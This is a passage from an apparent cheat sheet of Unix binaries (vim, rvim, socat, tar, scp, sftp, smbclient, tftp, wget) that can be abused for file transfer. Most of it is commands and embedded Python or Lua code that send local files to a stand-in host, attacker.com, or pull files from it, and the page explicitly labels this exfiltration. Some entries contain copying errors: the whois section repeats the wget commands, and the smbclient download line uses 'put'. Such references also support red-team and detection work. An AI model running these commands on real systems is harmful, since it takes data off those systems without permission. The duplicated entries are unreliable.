    r.urlretrieve(e["URL"], e["LFILE"])
    vim.command(":q!")'
  • Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that rvim is compiled with Lua support and that lua-socket is installed.

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    export LPORT=12345
    export LFILE=file_to_save
    rvim -c ':lua local k=require("socket");
    local s=assert(k.bind("*",os.getenv("LPORT")));
    local c=s:accept();
    local d,x=c:receive("*a");
    c:close();
    local f=io.open(os.getenv("LFILE"), "wb");
    f:write(d);
    io.close(f);'
  • SCP

File upload :
It can exfiltrate files on the network. Send local file to a SSH server.

1
2
3
[email protected]:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH

File Download :

It can download remote files. Fetch a remote file from a SSH server.

1
2
3
[email protected]:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
  • SFTP

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

1
2
3
[email protected]
sftp $RHOST
put file_to_send file_to_save

File download. It can download remote files. Fetch a remote file from a SSH server.

1
2
3
[email protected]
sftp $RHOST
get file_to_get file_to_save
  • SMBCLIENT

File upload : It can exfiltrate files on the network. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to collect the file.

1
smbclient '\\attacker\share' -c 'put file_to_send where_to_save'

File download : It can download remote files. Install Impacket and run sudo smbserver.py share /tmp on the attacker box to send the file.

smbclient '\\attacker\share' -c 'put file_to_send where_to_save'

  • socat

File upload. It can exfiltrate files on the network.

Run socat -u tcp-listen:12345,reuseaddr open:file_to_save,create on the attacker box to collect the file.

1
2
3
4
RHOST=attacker.com
RPORT=12345
LFILE=file_to_send
socat -u file:$LFILE tcp-connect:$RHOST:$RPORT

File download : It can download remote files. Run socat -u file:file_to_send tcp-listen:12345,reuseaddr on the attacker box to send the file.

1
2
3
4
RHOST=attacker.com
RPORT=12345
LFILE=file_to_save
socat -u tcp-connect:$RHOST:$RPORT open:$LFILE,creat
  • SSH

File upload. It can exfiltrate files on the network. Send local file to a SSH server.

1
2
3
4
[email protected]
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH

File download ; It can download remote files.

Fetch a remote file from a SSH server.

1
2
3
4
[email protected]
RPATH=file_to_get
LPATH=file_to_save
ssh $HOST "cat $RPATH" > $LPATH
  • tar

File upload
It can exfiltrate files on the network. This only works for GNU tar. Create tar archive and send it via SSH to a remote location. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

1
2
3
4
5
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_send.tar
LFILE=file_to_send
tar cvf $RUSER@$RHOST:$RFILE $LFILE --rsh-command=/bin/ssh

File download
It can download remote files.

This only works for GNU tar. Download and extract a tar archive via SSH. The attacker box must have the rmt utility installed (it should be present by default in Debian-like distributions).

1
2
3
4
RHOST=attacker.com
RUSER=root
RFILE=/tmp/file_to_get.tar
tar xvf $RUSER@$RHOST:$RFILE --rsh-command=/bin/ssh
  • TFtp

File upload : It can exfiltrate files on the network. Send local file to a TFTP server.

1
2
3
RHOST=attacker.com
tftp $RHOST
put file_to_send

File download : It can download remote files. Fetch a remote file from a TFTP server.

1
2
3
RHOST=attacker.com
tftp $RHOST
get file_to_get
  • vim

File upload : It can exfiltrate files on the network.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Send local file via “d” parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
1
2
3
4
5
6
7
export URL=http://attacker.com/
export LFILE=file_to_send
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r, urllib.parse as u
else: import urllib as u, urllib2 as r
r.urlopen(e["URL"], bytes(u.urlencode({"d":open(e["LFILE"]).read()}).encode()))
vim.command(":q!")'
  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Serve files in the local folder running an HTTP server.
1
2
3
4
5
6
export LPORT=8888
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()
vim.command(":q!")'
  • Send a local file via TCP. Run nc -l -p 12345 > "file_to_save" on the attacker box to collect the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
1
2
3
4
5
6
7
8
9
10
11
export RHOST=attacker.com
export RPORT=12345
export LFILE=file_to_send
vim -c ':lua local f=io.open(os.getenv("LFILE"), 'rb')
local d=f:read("*a")
io.close(f);
local s=require("socket");
local t=assert(s.tcp());
t:connect(os.getenv("RHOST"),os.getenv("RPORT"));
t:send(d);
t:close();'

File download ; It can download remote files.

  • This requires that vim is compiled with Python support. Prepend :py3 for Python 3. Fetch a remote file via HTTP GET request.
1
2
3
4
5
6
7
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
vim -c ':py import vim,sys; from os import environ as e
if sys.version_info.major == 3: import urllib.request as r
else: import urllib as r
r.urlretrieve(e["URL"], e["LFILE"])
vim.command(":q!")'
  • Fetch a remote file via TCP. Run nc target.com 12345 < “file_to_send” on the attacker box to send the file. This requires that vim is compiled with Lua support and that lua-socket is installed.
1
2
3
4
5
6
7
8
9
10
export LPORT=12345
export LFILE=file_to_save
vim -c ':lua local k=require("socket");
local s=assert(k.bind("*",os.getenv("LPORT")));
local c=s:accept();
local d,x=c:receive("*a");
c:close();
local f=io.open(os.getenv("LFILE"), "wb");
f:write(d);
io.close(f);'
  • wget

File upload : It can exfiltrate files on the network.

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.

1
2
3
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL

File download ; It can download remote files. Fetch a remote file via HTTP GET request.

1
2
3
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE
  • whois

File upload : It can exfiltrate files on the network.

Send local file with an HTTP POST request. Run an HTTP service on the attacker box to collect the file. Note that the file will be sent as-is, instruct the service to not URL-decode the body. Use –post-data to send hard-coded data.

1
2
3
URL=http://attacker.com/
LFILE=file_to_send
wget --post-file=$LFILE $URL

File download : It can download remote files.
Fetch a remote file via HTTP GET request.

1
2
3
URL=http://attacker.com/file_to_get
LFILE=file_to_save
wget $URL -O $LFILE

Sources : -